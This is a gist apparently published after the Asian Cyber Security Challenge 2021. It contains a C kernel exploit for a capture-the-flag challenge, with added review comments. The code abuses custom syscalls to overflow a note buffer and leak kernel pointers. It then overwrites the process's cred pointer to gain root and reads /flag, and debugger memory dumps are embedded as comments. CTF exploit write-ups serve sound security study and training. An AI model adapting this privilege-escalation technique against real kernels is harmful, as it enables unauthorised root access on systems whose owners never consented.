
@lordidiot
Created Sep 19, 2021
Asian Cyber Security Challenge 2021 Exploits
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/syscall.h>
/*
 * Syscall numbers handed to syscall(2) by main().
 * NOTE(review): these are presumably custom syscalls added by the challenge
 * kernel rather than stock Linux entries -- confirm against the challenge
 * source. The per-call notes below describe only how this file uses them.
 */
#define ADD 548   /* invoked as syscall(ADD, buf) */
#define DEL 549   /* defined but never invoked in this file */
#define SHOW 550  /* invoked as syscall(SHOW, buf) */
#define COPY 551  /* invoked as syscall(COPY, buf) */
#define CURR 552  /* invoked with no arguments; return value is used as a pointer */
/*
 * Block until one byte arrives on standard input (or read() returns for any
 * other reason), so a debugger can be attached before the process exits.
 */
void _pause()
{
    char key;

    fputs("[+] Press anything to continue\n", stdout);
    read(STDIN_FILENO, &key, sizeof key);
}
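/*
 * Store the pointer-sized value `value` at byte offset `off` inside `buf`.
 * memcpy replaces the original cast-and-dereference so the store does not
 * depend on alignment or on type punning through a char buffer.
 */
static void put_ptr(char *buf, size_t off, const void *value)
{
    memcpy(buf + off, &value, sizeof value);
}

/*
 * Proof-of-concept for a CTF challenge kernel (see the gist title). It drives
 * the challenge-specific syscalls ADD/SHOW/COPY/CURR with a user buffer and
 * then tries to read /flag.
 *
 * NOTE(review): the offsets used below (0x408, 0x410, 0x6a8, ...) come from
 * the author's debugging session and are specific to that kernel build. The
 * sequence appears to rely on the challenge syscalls copying caller-controlled
 * bytes without bounding them to the note size -- inferred from this file
 * only, not from the kernel source.
 *
 * Returns 0 on success, 1 if a setup step or the /flag read fails.
 */
int main(void)
{
    /* Offsets that receive the same pointer in both buffer layouts below. */
    static const size_t ptr_slots[] = { 0x78, 0x80, 0x88, 0x90, 0x110 };
    const size_t slot_count = sizeof ptr_slots / sizeof ptr_slots[0];
    int rc = 0;

    /* syscall() reports failure as -1; without the check a missing CURR
     * syscall would silently yield a bogus base address. */
    long curr_ret = syscall(CURR);
    if (curr_ret == -1) {
        perror("syscall(CURR)");
        return 1;
    }
    char *current = (char *)curr_ret;
    printf("[+] current: %p\n", (void *)current);

    /* The original comments label this address as the cred pointer. */
    const void *cred_slot = current + 0x6a8;

    // Copy to note
    char *s = malloc(0x1000);
    if (s == NULL) {
        perror("malloc");
        return 1;
    }
    printf("[+] s: %p\n", (void *)s);
    memset(s, 'A', 0x408);
    s[0x408] = '\x00';
    syscall(ADD, s);

    // Leak pointers
    syscall(SHOW, s);

    // Overwrite * cred
    // 81:0408│ 0x186bf88 —▸ 0xffff9e2782454840 ◂— add al, byte ptr [rax] /* 0x3e800000002 */
    // 82:0410│ 0x186bf90 —▸ 0xffff9e2782454840 ◂— add al, byte ptr [rax] /* 0x3e800000002 */
    put_ptr(s, 0x410, cred_slot);
    for (size_t i = 0; i < slot_count; i++) {
        put_ptr(s, ptr_slots[i], cred_slot);
    }
    syscall(ADD, s);

    // Setup cred
    // 08:0040│ 0xffff8cfc82456880 ◂— 0x1ffffffffff
    // 09:0048│ 0xffff8cfc82456888 ◂— 0
    // ... ↓ 5 skipped
    // 0f:0078│ 0xffff8cfc824568b8 —▸ 0xffff8cfc82404160 ◂— add dword ptr [rax], eax /* 0x100000001 */
    // 10:0080│ 0xffff8cfc824568c0 —▸ 0xffff8cfc823f1e80 ◂— add eax, 0x2000000 /* 0x200000005 */
    // 11:0088│ 0xffff8cfc824568c8 —▸ 0xffffffff99a4d5a0 ◂— 1
    // 12:0090│ 0xffff8cfc824568d0 —▸ 0xffff8cfc813e2cc0 ◂— add eax, 0x1000000 /* 0x100000005 */
    // 22:0110│ 0xffff8b1082455950 —▸ 0xffff8b10824559c0 ◂— 0
    memset(s, '\x00', 0x400);
    /* Explicit cast: the original assigned the integer constant to a void *
     * without one, which is a constraint violation in ISO C. */
    put_ptr(s, 0x40, (const void *)0x1ffffffffffUL);
    for (size_t i = 0; i < slot_count; i++) {
        put_ptr(s, ptr_slots[i], cred_slot);
    }
    syscall(COPY, s);

    /* Read the flag. One byte is reserved for the terminator: the original
     * passed a possibly unterminated 100-byte buffer to puts(), and used the
     * descriptor without checking that open() had succeeded. */
    char flag[100];
    int fd = open("/flag", O_RDONLY);
    if (fd < 0) {
        perror("open /flag");
        rc = 1;
    } else {
        ssize_t got = read(fd, flag, sizeof flag - 1);
        if (got < 0) {
            perror("read /flag");
            rc = 1;
        } else {
            flag[got] = '\0';
            puts(flag);
        }
        close(fd);
    }

    // Pause to debug
    _pause();
    free(s);
    return rc;
}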